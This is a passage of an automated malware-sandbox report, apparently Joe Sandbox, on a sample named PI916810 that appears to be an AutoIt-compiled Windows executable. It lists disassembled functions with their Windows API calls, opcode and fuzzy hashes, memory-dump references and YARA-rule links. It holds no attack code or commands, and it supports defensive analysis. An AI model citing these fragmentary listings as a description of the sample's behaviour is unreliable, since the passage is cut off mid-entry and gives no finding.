                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                            • Opcode ID: 7570b784aab25758a2785a5337e2f044c30568aaff3740cccd182f5fecad3ea0
                                                                                                                                                                            • Instruction ID: daba059dcaa35dfc0ebdec66b1ec3118a30c389ad9b0e443d6910e4d7dcb5d12
                                                                                                                                                                            • Opcode Fuzzy Hash: 7570b784aab25758a2785a5337e2f044c30568aaff3740cccd182f5fecad3ea0
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B016CB09017597DE3008F6A8C85B52FFA8FF19354F00411BA15C4B942C7F5A868CBE5
                                                                                                                                                                            Function 004C568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004C569B
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004C56B1
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 004C56C0
                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56CF
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56D9
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                            • Opcode ID: d19da38673854dd8109d3dbe188cee50b978ee2148335b854477a45dcc988d39
                                                                                                                                                                            • Instruction ID: 69dd88ed5da1bd0361cf28ed4d270a5397b3f14a95cedd1eac4642494676c9bd
                                                                                                                                                                            • Opcode Fuzzy Hash: d19da38673854dd8109d3dbe188cee50b978ee2148335b854477a45dcc988d39
                                                                                                                                                                            • Instruction Fuzzy Hash: D4F03631641598BBD7215B62DC4DEEF7B7CEFC6B11F000179F904D5091D7A11E0586B9
                                                                                                                                                                            Function 004C74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 004C74E5
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00471044,?,?), ref: 004C74F6
                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00471044,?,?), ref: 004C7503
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00471044,?,?), ref: 004C7510
                                                                                                                                                                              • Part of subcall function 004C6ED7: CloseHandle.KERNEL32(00000000,?,004C751D,?,00471044,?,?), ref: 004C6EE1
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 004C7523
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00471044,?,?), ref: 004C752A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                            • Opcode ID: f7f9225bc334aeefd5893ebf3ec6b26550ae4d44040a146374a8aef32fe64932
                                                                                                                                                                            • Instruction ID: 6b0c61bba326678ec612dcf414848f103aec659bb9d68a7462aeb8483f5e0311
                                                                                                                                                                            • Opcode Fuzzy Hash: f7f9225bc334aeefd5893ebf3ec6b26550ae4d44040a146374a8aef32fe64932
                                                                                                                                                                            • Instruction Fuzzy Hash: C4F0BE3A440A12EBDB111B24FCCCEEB772AEF04302B010576F202980B2CB761904CB58
                                                                                                                                                                            Function 004B8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B8E7F
                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 004B8E8B
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004B8E94
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004B8E9C
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004B8EA5
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004B8EAC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                            • Opcode ID: 3975e78c48ebe4c9a3192dbfbbcb435ae4b9d2c1a2acce8963ee7aefa5b1233a
                                                                                                                                                                            • Instruction ID: 9c0ff80119127fed19c8088554eb1cb889b0a511e99725226a6eb55f35f3c69c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3975e78c48ebe4c9a3192dbfbbcb435ae4b9d2c1a2acce8963ee7aefa5b1233a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE0C236004445FBDA011FE1EC4C90AFB69FF89322B108630F219890B1CB32A868DB58
                                                                                                                                                                            Function 004B7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C32
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C4A
                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,004EFB80,000000FF,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C6F
                                                                                                                                                                            • _memcmp.LIBCMT ref: 004B7C90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                            • String ID: ,,O
                                                                                                                                                                            • API String ID: 314563124-289689913
                                                                                                                                                                            • Opcode ID: 7003a81d2be4603c3a242d7ad924ad5aa894346c844c2de3acbd1b0122931406
                                                                                                                                                                            • Instruction ID: ed7cac94d49a6153896bd1f301c348a05c1e1f4b47e4e7ad1462a47f32e12b12
                                                                                                                                                                            • Opcode Fuzzy Hash: 7003a81d2be4603c3a242d7ad924ad5aa894346c844c2de3acbd1b0122931406
                                                                                                                                                                            • Instruction Fuzzy Hash: 00815A71A04109EFCB00DF94C984EEEB7B9FF89315F208199F506AB250DB75AE06CB64
                                                                                                                                                                            Function 004D8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004D8928
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004D8A37
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004D8BAF
                                                                                                                                                                              • Part of subcall function 004C7804: VariantInit.OLEAUT32(00000000), ref: 004C7844
                                                                                                                                                                              • Part of subcall function 004C7804: VariantCopy.OLEAUT32(00000000,?), ref: 004C784D
                                                                                                                                                                              • Part of subcall function 004C7804: VariantClear.OLEAUT32(00000000), ref: 004C7859
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                            • API String ID: 4237274167-1221869570
                                                                                                                                                                            • Opcode ID: f358baa3abb745b05fc3c9b9e531fc73c5ae0e0f42ec7288e872f8231cc9e9ac
                                                                                                                                                                            • Instruction ID: d3e1904f27781e23868e0518fe4c059c0b8e0f6b7cafb2b87d678c017ff7b864
                                                                                                                                                                            • Opcode Fuzzy Hash: f358baa3abb745b05fc3c9b9e531fc73c5ae0e0f42ec7288e872f8231cc9e9ac
                                                                                                                                                                            • Instruction Fuzzy Hash: 18916CB16083019FC710DF25C49096BBBE4AF89714F04496FF8968B362DB35E946CB56
                                                                                                                                                                            Function 004C2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                            • _memset.LIBCMT ref: 004C3077
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004C30A6
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004C3159
                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004C3187
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 4152858687-4108050209
                                                                                                                                                                            • Opcode ID: 86fcdfb7e2a0de2980d1d420b31c9c7436c03ce472710a6086e653b758d3cee5
                                                                                                                                                                            • Instruction ID: 01e896ee0742b0c647cd247298eb23079780f1af649165ae8ae32f026c79f63c
                                                                                                                                                                            • Opcode Fuzzy Hash: 86fcdfb7e2a0de2980d1d420b31c9c7436c03ce472710a6086e653b758d3cee5
                                                                                                                                                                            • Instruction Fuzzy Hash: C751F1396083009ED7A49F28C844F6B7BE4AF45325F08892FF885D2291DF78CE45879A
                                                                                                                                                                            Function 004C2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2CAF
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004C2CCB
                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 004C2D11
                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00526890,00000000), ref: 004C2D5A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                                                                            • Opcode ID: c72f5ee1f000de2e75686a255e28e3ced756daaa773d2a076d956a66761e43a7
                                                                                                                                                                            • Instruction ID: edb1fdc022e3cead86f181af2f6974a16ad376e09902e46eeb07c3219f3dca7b
                                                                                                                                                                            • Opcode Fuzzy Hash: c72f5ee1f000de2e75686a255e28e3ced756daaa773d2a076d956a66761e43a7
                                                                                                                                                                            • Instruction Fuzzy Hash: DE41D134204302AFD720DF24C980F1BB7E4AF95324F00462EF86297292D7F8E904CB9A
                                                                                                                                                                            Function 004B9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004B93F6
                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004B9409
                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 004B9439
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 365058703-1403004172
                                                                                                                                                                            • Opcode ID: 52bd4d8f78167f2c372c1aa74be81b0adf374143d80f0f83f456a7eccead5c60
                                                                                                                                                                            • Instruction ID: 60d5895aa7dcb897b5f51305a6a1702326f72e14dc8f8137f1b0f0eefd10d335
                                                                                                                                                                            • Opcode Fuzzy Hash: 52bd4d8f78167f2c372c1aa74be81b0adf374143d80f0f83f456a7eccead5c60
                                                                                                                                                                            • Instruction Fuzzy Hash: FF21E471904104ABDB14ABB1CC85DFFB768DF05354B10452FFA25A72E1DB3D4E0A9A29
                                                                                                                                                                            Function 0046410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0049D5EC
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • _memset.LIBCMT ref: 0046418D
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004641E1
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004641F1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                            • API String ID: 3942752672-1585850449
                                                                                                                                                                            • Opcode ID: d1eb1d7d543749643c94dd76fec346195f6f1cba7f959f64806754e0e1073281
                                                                                                                                                                            • Instruction ID: ec17e0a79ab0c9afedcd809f3ec9d479820a4816f011c63e81abf42008975b43
                                                                                                                                                                            • Opcode Fuzzy Hash: d1eb1d7d543749643c94dd76fec346195f6f1cba7f959f64806754e0e1073281
                                                                                                                                                                            • Instruction Fuzzy Hash: C231E471408304AAD731EB60DC45FDB77E8AF56308F10491FF585921A1FB78A649C79B
                                                                                                                                                                            Function 004E6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
                                                                                                                                                                              • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
                                                                                                                                                                              • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004E66D0
                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 004E66D7
                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004E66EC
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004E66F4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                            • API String ID: 4146253029-1011021900
                                                                                                                                                                            • Opcode ID: 8032c9338277e55e68cd3a56d07b5b7a393a4bdec36b8181c46c4939b1242cbb
                                                                                                                                                                            • Instruction ID: 9f361790fe077729a2df4e398215fb0f48ad9093b53f601b5b77b981190e5d88
                                                                                                                                                                            • Opcode Fuzzy Hash: 8032c9338277e55e68cd3a56d07b5b7a393a4bdec36b8181c46c4939b1242cbb
                                                                                                                                                                            • Instruction Fuzzy Hash: FF21C271110245AFEF104F76EC80EBB37ADEF693A9F11062AF91096290D775DC419768
                                                                                                                                                                            Function 004C703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 004C705E
                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C7091
                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 004C70A3
                                                                                                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004C70DD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                                                                            • Opcode ID: c3bee6c2a6443b046b325bbe8a8776bdea27c53e00e2e72c34ff317d7151a346
                                                                                                                                                                            • Instruction ID: 3f1ac80719f4daed3f8755a7dec3ae1ec31774e5d7bb027f334403842d364f42
                                                                                                                                                                            • Opcode Fuzzy Hash: c3bee6c2a6443b046b325bbe8a8776bdea27c53e00e2e72c34ff317d7151a346
                                                                                                                                                                            • Instruction Fuzzy Hash: E32183785042099BDB609F3ADC45F9A7BA8BF44724F208A2EFDA0D72D0D77598408F59
                                                                                                                                                                            Function 004C710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004C712B
                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C715D
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004C716E
                                                                                                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004C71A8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                                                                            • Opcode ID: f366c0f331b4738bd978fad7b5fb16746a7f8c5b12952ad1317543993c6afced
                                                                                                                                                                            • Instruction ID: 1571dcc6652564dc9ff5a9a91f56cfed05acb8885fefe2fa5c00a5dd411d97a0
